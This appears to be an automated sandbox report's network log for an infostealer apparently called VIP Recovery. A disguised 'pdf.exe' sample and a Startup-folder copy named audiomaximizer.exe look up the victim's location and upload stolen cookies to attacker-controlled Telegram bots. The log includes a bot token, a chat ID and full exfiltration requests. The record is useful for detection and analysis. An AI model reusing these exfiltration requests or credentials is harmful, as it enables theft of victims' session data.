                                                                                                                                                                              13192.168.2.449765104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:25 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:25 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081295
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1lOnUZmBQeCET9JnsaYSPkif5bgB%2F5hcKKsKh9WZIc0fnQxwcZQj36z6E1qJmMas6fhm06tFg3znal69id%2Fa4kRcyiPXOhgLnV0r%2FnYmk9vBk%2B0ZPqaTVtgExXBPDseVI8bn2p%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014eda5baf772b9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1765&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1639528&cwnd=217&unsent_bytes=0&cid=e15c78ced7da104d&ts=158&x=0"
                                                                                                                                                                              2025-01-13 11:08:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.2.449767104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:27 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              2025-01-13 11:08:27 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:27 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081296
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7dVH6NhwB5bYYTAiudn8e4m855aB5daZso8YOmY37ye%2FOMlSQ5nR8g2jEC4ZhdTLNsXXNLN%2B1Kxgtg81VIi5vbFsNHUMCTxwonk3%2BCwLrqeISUbu3qLqD0wMrcGXamTxiOV5LLXY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014edaec80341a6-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1579&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1839949&cwnd=241&unsent_bytes=0&cid=ca5b33dbb1c46e9c&ts=137&x=0"
                                                                                                                                                                              2025-01-13 11:08:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.449769104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:28 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:28 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081297
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrGh7y%2B%2BHkvnLVXpAOQowZJiQPNBkXEyLRpW4XRSEhjJCSgBQYVd4YuFl035YzubXn2EiZA9uk59%2Byj2pr%2BgSSQ59RqNy447ufPoi9kXT8gvGi9QiXz4Gs45%2BXA9vYZRVARabWv4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014edb7ec6c1875-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1595&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1810291&cwnd=153&unsent_bytes=0&cid=44375422c96b767c&ts=166&x=0"
                                                                                                                                                                              2025-01-13 11:08:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              16192.168.2.449771104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:31 UTC864INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:31 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081300
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lxU6PDWdZHfRhFUv%2FVySG7XhxBabSYnLbeQNy4Ekgoz7bLxC6FeYSolNBSPNv3UvX%2F1669r5Oe4%2FQ3TX%2FJFDs6aZVNj361U2BupevLi4m8eSEFq%2FrJpU7Q%2FmMCcr3sN%2Blg0C4IO%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014edc7ca894344-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1666&rtt_var=638&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1698662&cwnd=47&unsent_bytes=0&cid=56882176e36fbb35&ts=154&x=0"
                                                                                                                                                                              2025-01-13 11:08:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              17192.168.2.449773149.154.167.2204437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:32 UTC350OUTPOST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------8dd348fc5d06ecd
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Content-Length: 7046
                                                                                                                                                                              2025-01-13 11:08:32 UTC7046OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 38 66 63 35 64 30 36 65 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 30 37 38 31 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f
                                                                                                                                                                              Data Ascii: --------------------------8dd348fc5d06ecdContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:960781Date and Time: 13/01/2025 /
                                                                                                                                                                              2025-01-13 11:08:32 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:32 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 553
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              2025-01-13 11:08:32 UTC553INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 35 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 39 39 37 39 30 39 30 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 4f 57 45 52 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 65 74 73 64 65 61 6c 55 70 64 61 74 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 37 34 38 31 39 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 65 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 6e 6b 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 72 68 64 62 6c 61 6e 6b 75 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37
                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":4562,"from":{"id":7199790900,"is_bot":true,"first_name":"POWER2025","username":"LetsdealUpdateBot"},"chat":{"id":7437481970,"first_name":"Ben","last_name":"Blankus","username":"Lorhdblankus","type":"private"},"date":17367


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              18192.168.2.449774104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:33 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:33 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081302
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbg%2B6AHxcbdzh6NhfRezTNh0h%2F9fs7TZrwsMeXV9QJCiLm%2BdiRhLxACWQC6wEtqyAtUHwhHU9hj%2Fdw2fzDoHCncOJwCXafeVR%2B%2BbirHGts2GGYLPHaTT5Ox1WtIMz2cb8zSSSHQA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014edd2ad3ec327-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1591&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1607929&cwnd=189&unsent_bytes=0&cid=d41ffeaa5c99cada&ts=153&x=0"
                                                                                                                                                                              2025-01-13 11:08:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              19192.168.2.449776104.21.32.14437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              2025-01-13 11:08:34 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:34 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081303
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAwvTk3HUc%2B3eGSObsi2dzk9h6LXOyOzGNepa6gcCzyPUMDJ8dkZFOjyrdXyzKJa4y5CmcU77NYXycqMTk9luIC1X88FKRdSg%2FtwUoDkGQR5HXnT60IYUjfN5yM81exezbpLwLSK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014eddc0c8341a6-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1552&rtt_var=585&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1865814&cwnd=241&unsent_bytes=0&cid=f1623630ed2d645f&ts=143&x=0"
                                                                                                                                                                              2025-01-13 11:08:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              20192.168.2.449777149.154.167.2204437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:35 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:35 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:35 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              2025-01-13 11:08:35 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              21192.168.2.449778149.154.167.2204437556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:43 UTC350OUTPOST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------8dd34928e143909
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Content-Length: 7046
                                                                                                                                                                              2025-01-13 11:08:43 UTC7046OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 39 32 38 65 31 34 33 39 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 30 37 38 31 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f
                                                                                                                                                                              Data Ascii: --------------------------8dd34928e143909Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:960781Date and Time: 13/01/2025 /
                                                                                                                                                                              2025-01-13 11:08:43 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:43 GMT
